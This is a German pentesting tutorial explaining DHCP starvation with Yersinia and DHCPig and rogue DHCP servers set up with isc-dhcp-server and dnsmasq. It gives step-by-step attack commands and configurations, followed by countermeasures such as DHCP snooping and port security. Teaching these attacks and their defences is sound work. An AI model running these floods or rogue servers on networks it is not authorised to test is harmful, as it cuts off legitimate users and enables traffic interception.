DHCP Starvation Attack und Rogue DHCP Server: Eine Übersicht

DHCP Starvation Attack (Adresspool-Auszehrung)

Der DHCP Starvation Attack zielt darauf ab, den Adresspool eines DHCP-Servers zu erschöpfen, sodass legitime Clients keine IP-Adressen mehr erhalten können.

Funktionsweise

Ein Angreifer sendet eine große Anzahl gefälschter DHCP-Anfragen an den Server. Jede Anfrage verwendet eine unterschiedliche gefälschte MAC-Adresse. Dadurch weist der Server jeder Anfrage eine IP-Adresse zu, bis sein Adresspool erschöpft ist.

Werkzeuge und Befehle

In Kali Linux können verschiedene Tools für diesen Angriff verwendet werden, beispielsweise Yersinia oder DHCPig.

Verwendung von Yersinia

Yersinia ist ein mächtiges Framework für Angriffe auf Netzwerkprotokolle.

Installation (falls nicht vorhanden):

sudo apt-get update
sudo apt-get install yersinia

Starten von Yersinia im interaktiven Modus:

sudo yersinia -I

Im interaktiven Modus:

  1. Wählen Sie mit den Pfeiltasten DHCP aus.
  2. Drücken Sie Shift + A, um die verfügbaren Angriffe anzuzeigen.
  3. Wählen Sie “DHCP Discover flood” und bestätigen Sie.

Ausführung im Kommandozeilenmodus:

sudo yersinia dhcp -attack 1 -interface eth0

Ersetzen Sie eth0 durch die entsprechende Netzwerkschnittstelle.

Verwendung von DHCPig

DHCPig ist ein Tool speziell für DHCP Starvation Attacken.

Installation:

sudo apt-get install python-scapy
git clone https://github.com/kamorin/DHCPig.git
cd DHCPig

Ausführung:

sudo python DHCPig.py -i eth0

Rogue DHCP Server

Ein Rogue DHCP Server ist ein unerlaubter DHCP-Server im Netzwerk, der falsche oder manipulierte Netzwerkdaten an Clients verteilt.

Funktionsweise

Ein Angreifer startet einen eigenen DHCP-Server im Netzwerk. Dieser verteilt anfragenden Clients gefälschte Konfigurationsdaten, wie etwa falsche IP-Adressen, Gateways oder DNS-Server. Dies kann zu Netzwerkstörungen führen oder dazu genutzt werden, Datenverkehr umzuleiten (Man-in-the-Middle-Angriff).

Werkzeuge und Befehle

In Kali Linux kann man z.B. isc-dhcp-server oder dnsmasq verwenden, um einen Rogue DHCP Server einzurichten.

Verwendung von isc-dhcp-server

Installation:

sudo apt-get update
sudo apt-get install isc-dhcp-server

Konfiguration:

Bearbeiten Sie die Datei /etc/dhcp/dhcpd.conf und fügen Sie Folgendes hinzu:

default-lease-time 600;
max-lease-time 7200;
authoritative;
 
subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.100 192.168.1.200;
  option subnet-mask 255.255.255.0;
  option routers 192.168.1.1;  # Falsches Gateway
  option domain-name-servers 8.8.8.8, 8.8.4.4;  # Falsche DNS-Server
}

Starten des DHCP-Servers:

sudo systemctl restart isc-dhcp-server

Überprüfen Sie den Status:

sudo systemctl status isc-dhcp-server

Verwendung von dnsmasq

Installation:

sudo apt-get install dnsmasq

Konfiguration:

Bearbeiten Sie die Datei /etc/dnsmasq.conf:

interface=eth0
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=3,192.168.1.1  # Falsches Gateway
dhcp-option=6,8.8.8.8,8.8.4.4  # Falsche DNS-Server

Starten des Dienstes:

sudo systemctl restart dnsmasq

Gegenmaßnahmen und Schutzmechanismen

Schutz vor DHCP Starvation Attacks

  • Port Security auf Switches aktivieren: Begrenzen Sie die Anzahl der MAC-Adressen pro Port, um MAC-Flooding zu verhindern.
  • DHCP Snooping nutzen: Konfigurieren Sie Switches so, dass sie nur DHCP-Antworten von autorisierten Servern zulassen.
  • ARP Inspection: Überprüfen Sie ARP-Pakete auf ihre Gültigkeit.

Schutz vor Rogue DHCP Servern

  • DHCP Snooping verwenden: Switches können so konfiguriert werden, dass sie DHCP-Antworten nur von vertrauenswürdigen Ports akzeptieren.
  • Netzwerksegmentierung: Trennen Sie das Netzwerk in VLANs, um den Einflussbereich zu reduzieren.
  • Regelmäßige Netzwerkscans: Überwachen Sie das Netzwerk auf unbekannte DHCP-Server, z.B. mit Tools wie dhcp_probe.

Tags

DHCPNetzwerksicherheitPentestingKaliLinuxITSecurityDHCPStarvationRogueDHCPServer

Network-Attacks-Overview